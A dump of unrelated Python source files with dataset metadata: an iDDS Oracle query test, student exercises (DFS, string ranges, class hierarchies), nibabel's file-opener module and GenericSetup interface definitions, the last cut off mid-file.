| 2023-09-14T11:55:03 | 2019-04-23T19:18:37 |
Python
|
UTF-8
|
Python
| false | false | 1,990 |
py
|
#!/usr/bin/env python
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0OA
#
# Authors:
# - Wen Guan, <[email protected]>, 2019
"""
performance test to insert contents.
"""
import json
import cx_Oracle
from idds.common.config import config_get
# from idds.core.contents import add_content
def get_subfinished_requests(db_pool):
    """Run the hard-coded query below against an Oracle session from
    `db_pool`, pretty-print the JSON metadata in the first column of each
    row, and print a summary of the collected first-column values."""
    connection = db_pool.acquire()

    req_ids = []
    # earlier iterations of the query, kept for reference:
    # sql = """select request_id from atlas_IDDS.requests where status in (4,5) and scope!='hpo'"""
    sql = """select request_id from atlas_IDDS.requests where scope!='hpo' and ( status in (4,5) or request_id in (select request_id from atlas_idds.transforms where status in (4, 5) and transform_type=2)) order by request_id"""
    sql = """select request_id from atlas_idds.collections where status=4 and total_files > processed_files order by request_id asc"""
    sql = """select request_metadata, processing_metadata from atlas_idds.requests where request_id in (283511)"""
    cursor = connection.cursor()
    cursor.execute(sql)
    for row in cursor.fetchall():
        # first column is a CLOB holding JSON text; read() yields the string
        metadata = json.loads(row[0].read())
        print(json.dumps(metadata, sort_keys=True, indent=4))
        req_ids.append(row[0])
    cursor.close()
    connection.commit()
    db_pool.release(connection)
    print(len(req_ids))
    print(req_ids)
def get_session_pool():
    """Build a cx_Oracle session pool from the 'database.default' setting
    (expected format: oracle://user:password@tns)."""
    dsn = config_get('database', 'default').replace("oracle://", "")
    credentials, tns = dsn.split('@')
    user, passwd = credentials.split(':')
    return cx_Oracle.SessionPool(user, passwd, tns, min=12, max=20, increment=1)
def test():
    """Entry point: dump sub-finished request metadata from the database."""
    get_subfinished_requests(get_session_pool())


if __name__ == '__main__':
    test()
|
[
"[email protected]"
] | |
bee6572bdf3ba51f555860b1eca5428bf08419a8
|
ce3bd1c0f8ecb9bbe41ded050c702a35e82191f5
|
/khat3680_l04/src/t01.py
|
96aab39ff0aa54e8740da4a33efec24ebb80e6df
|
[] |
no_license
|
khat3680/Data_Sturct_Python
|
e368133d01cd790206f49e3f401b73961234955a
|
4ae75031b3abf36119331064bb119061ae6cd586
|
refs/heads/master
| 2022-12-10T02:59:01.016483 | 2020-09-11T16:46:31 | 2020-09-11T16:46:31 | 294,755,366 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 392 |
py
|
"""
-------------------------------------------------------
[program 1]
-------------------------------------------------------
Author: Anshul Khatri
ID: 193313680
Email: [email protected]
Section: CP164 Winter 2020
__updated__ = "2020-02-05"
-------------------------------------------------------
"""
from Food import Food

# Build a sample Food record and show its string representation
# (exercises Food.__str__).
# NOTE(review): the meaning of the positional arguments is defined by
# Food.__init__ — confirm against that class.
key_ = Food('Spring Rolls', 1, None, None)
print(key_)
|
[
"[email protected]"
] | |
58cf908172c2c19f3b964ed05323f0906af4c37e
|
5955ea34fd72c719f3cb78fbb3c7e802a2d9109a
|
/_STRUCTURES/String/deploy_str.py
|
b8cdf6f0aa4981933a3160534357a36a9727c468
|
[] |
no_license
|
AndreySperansky/TUITION
|
3c90ac45f11c70dce04008adc1e9f9faad840b90
|
583d3a760d1f622689f6f4f482c905b065d6c732
|
refs/heads/master
| 2022-12-21T21:48:21.936988 | 2020-09-28T23:18:40 | 2020-09-28T23:18:40 | 299,452,924 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 219 |
py
|
# Read an inclusive character range and print every character from the
# first to the last, by Unicode code point.  (Prompts are in Russian and
# are part of the program's runtime output — left unchanged.)
first = input("Введите первую букву :")
last = input("Введите последнюю букву :")

# Build the string in one pass with str.join instead of repeated ``+=``
# concatenation, which is quadratic in the worst case.  An empty range
# (first > last) yields an empty string, matching the original loop.
newStr = "".join(chr(code) for code in range(ord(first), ord(last) + 1))
print(newStr)
|
[
"[email protected]"
] | |
62c04ba164efc46580a8e29802b2c3105d28e244
|
114c1f7ceff04e00591f46eeb0a2eb387ac65710
|
/g4g/DS/Graphs/Introductions_and_traversals/10_prac.py
|
b8308399c38cc993c17302967aa9c44a0beebb89
|
[] |
no_license
|
sauravgsh16/DataStructures_Algorithms
|
0783a5e6dd00817ac0b6f2b856ad8d82339a767d
|
d3133f026f972f28bd038fcee9f65784f5d3ea8b
|
refs/heads/master
| 2020-04-23T03:00:29.713877 | 2019-11-25T10:52:33 | 2019-11-25T10:52:33 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 945 |
py
|
''' Iterative DFS '''
class Graph(object):
    """Directed graph stored as an adjacency list, with an iterative DFS.

    Python 2 code (uses the ``print s,`` statement).
    """

    def __init__(self, vertices):
        # Number of vertices; vertices are labelled 0 .. vertices-1.
        self.V = vertices
        # adj[u] lists the vertices reachable from u by a single edge.
        self.adj = [[] for i in range(self.V)]

    def DFS_Util(self, s, visited):
        # Iterative depth-first traversal from s using an explicit stack;
        # prints each vertex the first time it is popped.
        stack = []
        stack.append(s)
        while len(stack) != 0:
            s = stack.pop()
            if visited[s] == False:
                print s,
                visited[s] = True
            # Push all not-yet-visited neighbours of s.
            i = 0
            while i < len(self.adj[s]):
                if visited[self.adj[s][i]] == False:
                    stack.append(self.adj[s][i])
                i += 1

    def add_edge(self, src, dest):
        # Directed edge src -> dest (no reverse edge is added).
        self.adj[src].append(dest)

    def dfs(self):
        # Start a DFS from every unvisited vertex so that disconnected
        # components are also covered.
        visited = [False] * self.V
        for i in range(self.V):
            if visited[i] == False:
                self.DFS_Util(i, visited)
# Build a small 5-vertex directed graph and print its DFS order.
g1 = Graph(5)
g1.add_edge(1, 0)
g1.add_edge(0, 2)
g1.add_edge(2, 1)
g1.add_edge(0, 3)
g1.add_edge(1, 4)
g1.dfs()
|
[
"[email protected]"
] | |
25b0c8725635d704fb1f7630816a948146eeb750
|
155fa6aaa4ef31cc0dbb54b7cf528f36743b1663
|
/Polymorphism and Abstraction/wild_farm/animals/birds.py
|
41ba401c5676fd4ca96f767957cdbdc132188929
|
[] |
no_license
|
GBoshnakov/SoftUni-OOP
|
efe77b5e1fd7d3def19338cc7819f187233ecab0
|
0145abb760b7633ca326d06a08564fad3151e1c5
|
refs/heads/main
| 2023-07-13T18:54:39.761133 | 2021-08-27T08:31:07 | 2021-08-27T08:31:07 | 381,711,275 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 628 |
py
|
from wild_farm.animals.animal import Bird
from wild_farm.food import Meat
class Hen(Bird):
    """A hen: eats any kind of food, gaining 0.35 kg per unit eaten."""

    weight_gainer = 0.35

    def make_sound(self):
        return "Cluck"

    def feed(self, food):
        # Hens accept every food type; track weight gain and intake.
        gained = food.quantity * Hen.weight_gainer
        self.weight += gained
        self.food_eaten += food.quantity
class Owl(Bird):
    """An owl: eats only meat, gaining 0.25 kg per unit eaten."""

    weight_gainer = 0.25

    def make_sound(self):
        return "Hoot Hoot"

    def feed(self, food):
        """Feed the owl; returns a refusal message for non-meat food."""
        # isinstance (rather than an exact ``type(...) != Meat`` comparison)
        # is the idiomatic type check and also accepts Meat subclasses.
        if not isinstance(food, Meat):
            return f"{type(self).__name__} does not eat {type(food).__name__}!"
        self.weight += food.quantity * Owl.weight_gainer
        self.food_eaten += food.quantity
|
[
"[email protected]"
] | |
f47a10d8f4a3f749041c6241c6d0fd65b7ff1a94
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/303/usersdata/296/78905/submittedfiles/testes.py
|
a1d13bb4b7617dba4b5f62c6fc00e07d617132c1
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 217 |
py
|
# -*- coding: utf-8 -*-
# START HERE BELOW
# Read two integers and print their sum when it exceeds 10; otherwise
# print a placeholder answer.  Prompts/output are Portuguese runtime
# strings and are left unchanged.
n = int(input("Digite o primeiro número: "))
m = int(input("Digite o segundo número: "))
soma = m + n
if soma > 10:
    print(soma)
else:
    print("Não sei")
|
[
"[email protected]"
] | |
d09aff13b635db27d2ff88145cbb666e5953d834
|
d094ba0c8a9b1217fbf014aa79a283a49aabe88c
|
/env/lib/python3.6/site-packages/nibabel/openers.py
|
e5514045614eb4e640823461dde15e9dc9b56831
|
[
"Apache-2.0"
] |
permissive
|
Raniac/NEURO-LEARN
|
d9274e0baadd97bb02da54bdfcf6ca091fc1c703
|
3c3acc55de8ba741e673063378e6cbaf10b64c7a
|
refs/heads/master
| 2022-12-25T23:46:54.922237 | 2020-09-06T03:15:14 | 2020-09-06T03:15:14 | 182,013,100 | 9 | 2 |
Apache-2.0
| 2022-12-09T21:01:00 | 2019-04-18T03:57:00 |
CSS
|
UTF-8
|
Python
| false | false | 9,177 |
py
|
# emacs: -*- mode: python-mode; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
#
# See COPYING file distributed along with the NiBabel package for the
# copyright and license terms.
#
### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
""" Context manager openers for various fileobject types
"""
import sys
if sys.version_info[0] < 3:
from bz2file import BZ2File
else:
from bz2 import BZ2File
import gzip
import sys
import warnings
from os.path import splitext
from distutils.version import StrictVersion
# is indexed_gzip present and modern?
# Detect an optional, sufficiently recent indexed_gzip at import time and
# expose two module globals: HAVE_INDEXED_GZIP (bool) and, when available,
# IndexedGzipFile (the class to use for fast random-access gzip reads).
try:
    import indexed_gzip as igzip
    version = igzip.__version__

    HAVE_INDEXED_GZIP = True

    # < 0.7 - no good
    # NOTE(review): the warning text below contains a stray ')' — message
    # only, left byte-identical here.
    if StrictVersion(version) < StrictVersion('0.7.0'):
        warnings.warn('indexed_gzip is present, but too old '
                      '(>= 0.7.0 required): {})'.format(version))
        HAVE_INDEXED_GZIP = False
    # >= 0.8 SafeIndexedGzipFile renamed to IndexedGzipFile
    elif StrictVersion(version) < StrictVersion('0.8.0'):
        IndexedGzipFile = igzip.SafeIndexedGzipFile
    else:
        IndexedGzipFile = igzip.IndexedGzipFile

    # Drop the module alias and version string from the module namespace;
    # only HAVE_INDEXED_GZIP and (maybe) IndexedGzipFile are kept.
    del igzip, version

except ImportError:
    HAVE_INDEXED_GZIP = False

# The largest memory chunk that gzip can use for reads
GZIP_MAX_READ_CHUNK = 100 * 1024 * 1024  # 100Mb
class BufferedGzipFile(gzip.GzipFile):
    """GzipFile able to readinto buffer >= 2**32 bytes.

    This class only differs from gzip.GzipFile
    in Python 3.5.0.

    This works around a known issue in Python 3.5.
    See https://bugs.python.org/issue25626
    """
    # This helps avoid defining readinto in Python 2.6,
    # where it is undefined on gzip.GzipFile.
    # It also helps limit the exposure to this code.
    # NOTE: the two methods below exist only when running exactly Python
    # 3.5.0; on every other version this class is an empty subclass of
    # gzip.GzipFile with unchanged behaviour.
    if sys.version_info[:3] == (3, 5, 0):
        def __init__(self, fileish, mode='rb', compresslevel=9,
                     buffer_size=2**32 - 1):
            # buffer_size caps the size of each underlying readinto call.
            super(BufferedGzipFile, self).__init__(fileish, mode=mode,
                                                   compresslevel=compresslevel)
            self.buffer_size = buffer_size

        def readinto(self, buf):
            """Uses self.buffer_size to do a buffered read."""
            n_bytes = len(buf)
            if n_bytes < 2 ** 32:
                return super(BufferedGzipFile, self).readinto(buf)
            # This works around a known issue in Python 3.5.
            # See https://bugs.python.org/issue25626
            mv = memoryview(buf)
            n_read = 0
            max_read = 2 ** 32 - 1  # Max for unsigned 32-bit integer
            while (n_read < n_bytes):
                n_wanted = min(n_bytes - n_read, max_read)
                n_got = super(BufferedGzipFile, self).readinto(
                    mv[n_read:n_read + n_wanted])
                n_read += n_got
                # A short read means EOF (or error): stop rather than spin.
                if n_got != n_wanted:
                    break
            return n_read
def _gzip_open(filename, mode='rb', compresslevel=9, keep_open=False):
    """Open a gzip file, preferring indexed_gzip for read access.

    When indexed_gzip is available and the file is opened read-only
    ('rb'), an IndexedGzipFile is returned; ``keep_open`` controls
    whether it keeps the underlying file handle open between reads
    (otherwise it closes/reopens the file on each read).  In every other
    case the built-in gzip machinery is used via BufferedGzipFile.
    """
    use_indexed = HAVE_INDEXED_GZIP and mode == 'rb'
    if use_indexed:
        fobj = IndexedGzipFile(filename, drop_handles=not keep_open)
    else:
        fobj = BufferedGzipFile(filename, mode, compresslevel)
    # Larger read buffer speeds up large files on Python < 3.5; see
    # https://github.com/nipy/nibabel/pull/210 for discussion (#209).
    if hasattr(fobj, 'max_read_chunk'):
        fobj.max_read_chunk = GZIP_MAX_READ_CHUNK
    return fobj
class Opener(object):
    """ Class to accept, maybe open, and context-manage file-likes / filenames

    Provides context manager to close files that the constructor opened for
    you.

    Parameters
    ----------
    fileish : str or file-like
        if str, then open with suitable opening method. If file-like, accept as
        is
    \*args : positional arguments
        passed to opening method when `fileish` is str. ``mode``, if not
        specified, is `rb`. ``compresslevel``, if relevant, and not specified,
        is set from class variable ``default_compresslevel``. ``keep_open``, if
        relevant, and not specified, is ``False``.
    \*\*kwargs : keyword arguments
        passed to opening method when `fileish` is str. Change of defaults as
        for \*args
    """
    # (opening callable, names of the positional args it accepts) per
    # compressed-file extension; the None entry is the uncompressed default.
    gz_def = (_gzip_open, ('mode', 'compresslevel', 'keep_open'))
    bz2_def = (BZ2File, ('mode', 'buffering', 'compresslevel'))
    compress_ext_map = {
        '.gz': gz_def,
        '.bz2': bz2_def,
        None: (open, ('mode', 'buffering'))  # default
    }
    #: default compression level when writing gz and bz2 files
    default_compresslevel = 1
    #: whether to ignore case looking for compression extensions
    compress_ext_icase = True

    def __init__(self, fileish, *args, **kwargs):
        if self._is_fileobj(fileish):
            # Caller handed us an already-open file object: adopt it, but
            # remember we did not open it (so we will not close it).
            self.fobj = fileish
            self.me_opened = False
            self._name = None
            return
        opener, arg_names = self._get_opener_argnames(fileish)
        # Merge positional args (mapped onto their names) with keyword args
        # so we can tell whether the caller supplied a value *either* way.
        full_kwargs = kwargs.copy()
        n_args = len(args)
        full_kwargs.update(dict(zip(arg_names[:n_args], args)))
        # Set default mode
        if 'mode' not in full_kwargs:
            kwargs['mode'] = 'rb'
        # Default compression level.  BUGFIX: check ``full_kwargs`` rather
        # than ``kwargs`` — checking ``kwargs`` alone injected a duplicate
        # keyword (TypeError) whenever compresslevel was passed positionally.
        if 'compresslevel' in arg_names and 'compresslevel' not in full_kwargs:
            kwargs['compresslevel'] = self.default_compresslevel
        # Default keep_open hint, only for openers that accept it.
        # BUGFIX: same positional-vs-keyword duplication fix as above.
        if 'keep_open' in arg_names:
            if 'keep_open' not in full_kwargs:
                kwargs['keep_open'] = False
        # Clear keep_open hint if it is not relevant for the file type
        else:
            kwargs.pop('keep_open', None)
        self.fobj = opener(fileish, *args, **kwargs)
        self._name = fileish
        self.me_opened = True

    def _get_opener_argnames(self, fileish):
        """Return (opener, accepted-arg-names) for `fileish`'s extension."""
        _, ext = splitext(fileish)
        if self.compress_ext_icase:
            # Case-insensitive match: compare lower-cased extensions.
            ext = ext.lower()
            for key in self.compress_ext_map:
                if key is None:
                    continue
                if key.lower() == ext:
                    return self.compress_ext_map[key]
        elif ext in self.compress_ext_map:
            return self.compress_ext_map[ext]
        # Unrecognized extension: treat as an uncompressed file.
        return self.compress_ext_map[None]

    def _is_fileobj(self, obj):
        """ Is `obj` a file-like object?
        """
        return hasattr(obj, 'read') and hasattr(obj, 'write')

    @property
    def closed(self):
        return self.fobj.closed

    @property
    def name(self):
        """ Return ``self.fobj.name`` or self._name if not present

        self._name will be None if object was created with a fileobj, otherwise
        it will be the filename.
        """
        try:
            return self.fobj.name
        except AttributeError:
            return self._name

    @property
    def mode(self):
        return self.fobj.mode

    # The methods below simply delegate to the wrapped file object.
    def fileno(self):
        return self.fobj.fileno()

    def read(self, *args, **kwargs):
        return self.fobj.read(*args, **kwargs)

    def readinto(self, *args, **kwargs):
        return self.fobj.readinto(*args, **kwargs)

    def write(self, *args, **kwargs):
        return self.fobj.write(*args, **kwargs)

    def seek(self, *args, **kwargs):
        return self.fobj.seek(*args, **kwargs)

    def tell(self, *args, **kwargs):
        return self.fobj.tell(*args, **kwargs)

    def close(self, *args, **kwargs):
        return self.fobj.close(*args, **kwargs)

    def __iter__(self):
        return iter(self.fobj)

    def close_if_mine(self):
        """ Close ``self.fobj`` iff we opened it in the constructor
        """
        if self.me_opened:
            self.close()

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        self.close_if_mine()
class ImageOpener(Opener):
    """ Opener-type class to collect extra compressed extensions

    A trivial sub-class of opener to which image classes can add extra
    extensions with custom openers, such as compressed openers.

    To add an extension, add a line to the class definition (not __init__):

        ImageOpener.compress_ext_map[ext] = func_def

    ``ext`` is a file extension beginning with '.' and should be included in
    the image class's ``valid_exts`` tuple.

    ``func_def`` is a `(function, (args,))` tuple, where `function accepts a
    filename as the first parameter, and `args` defines the other arguments
    that `function` accepts. These arguments must be any (unordered) subset of
    `mode`, `compresslevel`, and `buffering`.
    """
    # Own copy of the extension map, so registrations made on ImageOpener
    # do not leak back into the base Opener class.
    compress_ext_map = dict(Opener.compress_ext_map)
|
[
"[email protected]"
] | |
bf3448d849c5de2d925e689c949e860cc37bcc98
|
c4af67db4c523d20f2d55aef90ba77db1fb53c38
|
/GenericSetup/interfaces.py
|
86d238f328d67b4bf37f34be5405172baad75cc7
|
[] |
no_license
|
dtgit/dtedu
|
e59b16612d7d9ea064026bf80a44657082ef45a3
|
d787885fe7ed0de6f9e40e9b05d852a0e9d60677
|
refs/heads/master
| 2020-04-06T05:22:50.025074 | 2009-04-08T20:13:20 | 2009-04-08T20:13:20 | 171,351 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 23,918 |
py
|
##############################################################################
#
# Copyright (c) 2004 Zope Corporation and Contributors. All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
""" GenericSetup product interfaces
$Id: interfaces.py 76859 2007-06-20 19:24:38Z rafrombrc $
"""
from zope.interface import Interface
from zope.schema import Text
from zope.schema import TextLine
# Please note that these values may change. Always import
# the values from here instead of using the values directly.
BASE, EXTENSION = 1, 2
SKIPPED_FILES = ('CVS', '.svn', '_svn', '_darcs')
SKIPPED_SUFFIXES = ('~',)
class IPseudoInterface( Interface ):
""" API documentation; not testable / enforceable.
"""
class ISetupEnviron(Interface):
"""Context for im- and export adapters.
"""
def getLogger(name):
"""Get a logger with the specified name, creating it if necessary.
"""
def shouldPurge():
"""When installing, should the existing setup be purged?
"""
class ISetupContext(ISetupEnviron):
""" Context used for export / import plugins.
"""
def getSite():
""" Return the site object being configured / dumped.
"""
def getSetupTool():
""" Return the site object being configured / dumped.
"""
def getEncoding():
""" Get the encoding used for configuration data within the site.
o Return None if the data should not be encoded.
"""
def listNotes():
""" Return notes recorded by this context.
o Result a sequence of (component, message) tuples
"""
def clearNotes():
""" Clear all notes recorded by this context.
"""
class IImportContext( ISetupContext ):
def readDataFile( filename, subdir=None ):
""" Search the current configuration for the requested file.
o 'filename' is the name (without path elements) of the file.
o 'subdir' is an optional subdirectory; if not supplied, search
only the "root" directory.
o Return the file contents as a string, or None if the
file cannot be found.
"""
def getLastModified( path ):
""" Return the modification timestamp of the item at 'path'.
o Result will be a DateTime instance.
o Search profiles in the configuration in order.
o If the context is filesystem based, return the 'stat' timestamp
of the file / directory to which 'path' points.
o If the context is ZODB-based, return the Zope modification time
of the object to which 'path' points.
o Return None if 'path' does not point to any object.
"""
def isDirectory( path ):
""" Test whether path points to a directory / folder.
o If the context is filesystem based, check that 'path' points to
a subdirectory within the "root" directory.
o If the context is ZODB-based, check that 'path' points to a
"container" under the context's tool.
o Return None if 'path' does not resolve; otherwise, return a
bool.
"""
def listDirectory( path, skip=SKIPPED_FILES ):
""" List IDs of the contents of a directory / folder.
o Omit names in 'skip'.
o If 'path' does not point to a directory / folder, return None.
"""
class IImportPlugin( IPseudoInterface ):
""" Signature for callables used to import portions of site configuration.
"""
def __call__( context ):
""" Perform the setup step.
o Return a message describing the work done.
o 'context' must implement IImportContext.
"""
class IExportContext( ISetupContext ):
def writeDataFile( filename, text, content_type, subdir=None ):
""" Write data into the specified location.
o 'filename' is the unqualified name of the file.
o 'text' is the content of the file.
o 'content_type' is the MIMEtype of the file.
o 'subdir', if passed, is a path to a subdirectory / folder in
which to write the file; if not passed, write the file to the
"root" of the target.
"""
class IExportPlugin( IPseudoInterface ):
""" Signature for callables used to export portions of site configuration.
"""
def __call__( context ):
""" Write export data for the site wrapped by context.
o Return a message describing the work done.
o 'context' must implement IExportContext. The plugin will use
its 'writeDataFile' method for each file to be exported.
"""
class IStepRegistry( Interface ):
""" Base interface for step registries.
"""
def listSteps():
""" Return a sequence of IDs of registered steps.
o Order is not significant.
"""
def listStepMetadata():
""" Return a sequence of mappings describing registered steps.
o Mappings will be ordered alphabetically.
"""
def getStepMetadata( key, default=None ):
""" Return a mapping of metadata for the step identified by 'key'.
o Return 'default' if no such step is registered.
o The 'handler' metadata is available via 'getStep'.
"""
def generateXML():
""" Return a round-trippable XML representation of the registry.
o 'handler' values are serialized using their dotted names.
"""
def parseXML( text ):
""" Parse 'text'.
"""
class IImportStepRegistry( IStepRegistry ):
""" API for import step registry.
"""
def sortSteps():
""" Return a sequence of registered step IDs
o Sequence is sorted topologically by dependency, with the dependent
steps *after* the steps they depend on.
"""
def checkComplete():
""" Return a sequence of ( node, edge ) tuples for unsatisifed deps.
"""
def getStep( key, default=None ):
""" Return the IImportPlugin registered for 'key'.
o Return 'default' if no such step is registered.
"""
def registerStep( id
, version
, handler
, dependencies=()
, title=None
, description=None
):
""" Register a setup step.
o 'id' is a unique name for this step,
o 'version' is a string for comparing versions, it is preferred to
be a yyyy/mm/dd-ii formatted string (date plus two-digit
ordinal). when comparing two version strings, the version with
the lower sort order is considered the older version.
- Newer versions of a step supplant older ones.
- Attempting to register an older one after a newer one results
in a KeyError.
o 'handler' should implement IImportPlugin.
o 'dependencies' is a tuple of step ids which have to run before
this step in order to be able to run at all. Registration of
steps that have unmet dependencies are deferred until the
dependencies have been registered.
o 'title' is a one-line UI description for this step.
If None, the first line of the documentation string of the handler
is used, or the id if no docstring can be found.
o 'description' is a one-line UI description for this step.
If None, the remaining line of the documentation string of
the handler is used, or default to ''.
"""
class IExportStepRegistry( IStepRegistry ):
""" API for export step registry.
"""
def getStep( key, default=None ):
""" Return the IExportPlugin registered for 'key'.
o Return 'default' if no such step is registered.
"""
def registerStep( id, handler, title=None, description=None ):
""" Register an export step.
o 'id' is the unique identifier for this step
o 'handler' should implement IExportPlugin.
o 'title' is a one-line UI description for this step.
If None, the first line of the documentation string of the step
is used, or the id if no docstring can be found.
o 'description' is a one-line UI description for this step.
If None, the remaining line of the documentation string of
the step is used, or default to ''.
"""
class IToolsetRegistry( Interface ):

    """ API for toolset registry.
    """
    def listForbiddenTools():

        """ Return a list of IDs of tools which must be removed, if present.
        """

    def addForbiddenTool(tool_id ):

        """ Add 'tool_id' to the list of forbidden tools.

        o Raise KeyError if 'tool_id' is already in the list.

        o Raise ValueError if 'tool_id' is in the "required" list.
        """

    def listRequiredTools():

        """ Return a list of IDs of tools which must be present.
        """

    def getRequiredToolInfo( tool_id ):

        """ Return a mapping describing a particular required tool.

        o Keys include:

          'id' -- the ID of the tool

          'class' -- a dotted path to its class

        o Raise KeyError if 'tool_id' is not a known tool.
        """

    def listRequiredToolInfo():

        # NOTE(review): despite the docstring, the method name suggests this
        # returns the info mappings rather than bare IDs — confirm against
        # the implementation.
        """ Return a list of IDs of tools which must be present.
        """

    def addRequiredTool( tool_id, dotted_name ):

        """ Add a tool to our "required" list.

        o 'tool_id' is the tool's ID.

        o 'dotted_name' is a dotted (importable) name of the tool's class.

        o Raise KeyError if we have already registered a class for 'tool_id'.

        o Raise ValueError if 'tool_id' is in the "forbidden" list.
        """
class IProfileRegistry( Interface ):
""" API for profile registry.
"""
def getProfileInfo( profile_id, for_=None ):
""" Return a mapping describing a registered filesystem profile.
o Keys include:
'id' -- the ID of the profile
'title' -- its title
'description' -- a textual description of the profile
'path' -- a path to the profile on the filesystem.
'product' -- the name of the product to which 'path' is
relative (None for absolute paths).
'type' -- either BASE or EXTENSION
o 'for_', if passed, should be the interface specifying the "site
type" for which the profile is relevant, e.g.
Products.CMFCore.interfaces.ISiteRoot or
Products.PluggableAuthService.interfaces.IPluggableAuthService.
If 'None', list all profiles.
"""
def listProfiles( for_=None ):
""" Return a list of IDs for registered profiles.
o 'for_', if passed, should be the interface specifying the "site
type" for which the profile is relevant, e.g.
Products.CMFCore.interfaces.ISiteRoot or
Products.PluggableAuthService.interfaces.IPluggableAuthService.
If 'None', list all profiles.
"""
def listProfileInfo( for_=None ):
""" Return a list of mappings describing registered profiles.
o See 'getProfileInfo' for a description of the mappings' keys.
o 'for_', if passed, should be the interface specifying the "site
type" for which the profile is relevant, e.g.
Products.CMFCore.interfaces.ISiteRoot or
Products.PluggableAuthService.interfaces.IPluggableAuthService.
If 'None', list all profiles.
"""
def registerProfile( name
, title
, description
, path
, product=None
, profile_type=BASE
, for_=None
):
""" Add a new profile to the registry.
o If an existing profile is already registered for 'product:name',
raise KeyError.
o If 'product' is passed, then 'path' should be interpreted as
relative to the corresponding product directory.
o 'for_', if passed, should be the interface specifying the "site
type" for which the profile is relevant, e.g.
Products.CMFCore.interfaces.ISiteRoot or
Products.PluggableAuthService.interfaces.IPluggableAuthService.
If 'None', the profile might be used in any site.
"""
class ISetupTool( Interface ):
""" API for SetupTool.
"""
def getEncoding():
""" Get the encoding used for configuration data within the site.
o Return None if the data should not be encoded.
"""
def getImportContextID():
""" Get the ID of the active import context.
DEPRECATED. The idea of a stateful active import context is
going away.
"""
def getBaselineContextID():
""" Get the ID of the base profile for this configuration.
"""
def setImportContext( context_id ):
""" Set the ID of the active import context and update the registries.
DEPRECATED. The idea of a stateful active import context is
going away.
"""
def setBaselineContext( context_id, encoding=None):
""" Specify the base profile for this configuration.
"""
def applyContext( context, encoding=None ):
""" Update the tool from the supplied context, without modifying its
"permanent" ID.
"""
def getImportStepRegistry():
""" Return the IImportStepRegistry for the tool.
"""
def getExportStepRegistry():
""" Return the IExportStepRegistry for the tool.
"""
def getToolsetRegistry():
""" Return the IToolsetRegistry for the tool.
"""
def runImportStepFromProfile(profile_id, step_id,
run_dependencies=True, purge_old=None):
""" Execute a given setup step from the given profile.
o 'profile_id' must be a valid ID of a registered profile;
otherwise, raise KeyError.
o 'step_id' is the ID of the step to run.
o If 'purge_old' is True, then run the step after purging any
"old" setup first (this is the responsibility of the step,
which must check the context we supply).
o If 'run_dependencies' is True, then run any out-of-date
dependency steps first.
o Return a mapping, with keys:
'steps' -- a sequence of IDs of the steps run.
'messages' -- a dictionary holding messages returned from each
step
"""
def runImportStep(step_id, run_dependencies=True, purge_old=None):
""" Execute a given setup step from the current
_import_context_id context.
o 'step_id' is the ID of the step to run.
o If 'purge_old' is True, then run the step after purging any
"old" setup first (this is the responsibility of the step,
which must check the context we supply).
o If 'run_dependencies' is True, then run any out-of-date
dependency steps first.
o Return a mapping, with keys:
'steps' -- a sequence of IDs of the steps run.
'messages' -- a dictionary holding messages returned from each
step
DEPRECATED. Use runImportStepFromProfile instead.
"""
def runAllImportStepsFromProfile(profile_id, purge_old=None):
""" Run all setup steps for the given profile in dependency order.
o 'profile_id' must be a valid ID of a registered profile;
otherwise, raise KeyError.
o If 'purge_old' is True, then run each step after purging any
"old" setup first (this is the responsibility of the step,
which must check the context we supply).
o Return a mapping, with keys:
'steps' -- a sequence of IDs of the steps run.
'messages' -- a dictionary holding messages returned from each
step
"""
def runAllImportSteps(purge_old=None):
""" Run all setup steps for the _import_context_id profile in
dependency order.
o If 'purge_old' is True, then run each step after purging any
"old" setup first (this is the responsibility of the step,
which must check the context we supply).
o Return a mapping, with keys:
'steps' -- a sequence of IDs of the steps run.
'messages' -- a dictionary holding messages returned from each
step
DEPRECATED. Use runAllImportStepsFromProfile instead.
"""
def runExportStep( step_id ):
""" Generate a tarball containing artifacts from one export step.
o 'step_id' identifies the export step.
o Return a mapping, with keys:
'steps' -- a sequence of IDs of the steps run.
'messages' -- a dictionary holding messages returned from each
step
'tarball' -- the stringified tar-gz data.
"""
def runAllExportSteps():
""" Generate a tarball containing artifacts from all export steps.
o Return a mapping, with keys:
'steps' -- a sequence of IDs of the steps run.
'messages' -- a dictionary holding messages returned from each
step
'tarball' -- the stringified tar-gz data.
"""
def createSnapshot( snapshot_id ):
""" Create a snapshot folder using all steps.
o 'snapshot_id' is the ID of the new folder.
"""
def compareConfigurations( lhs_context
, rhs_context
, missing_as_empty=False
, ignore_whitespace=False
):
""" Compare two configurations.
o 'lhs_context' and 'rhs_context' must implement IImportContext.
o If 'missing_as_empty', then compare files not present as though
they were zero-length; otherwise, omit such files.
o If 'ignore_whitespace', then suppress diffs due only to whitespace
(c.f: 'diff -wbB')
"""
def getProfileImportDate(profile_id):
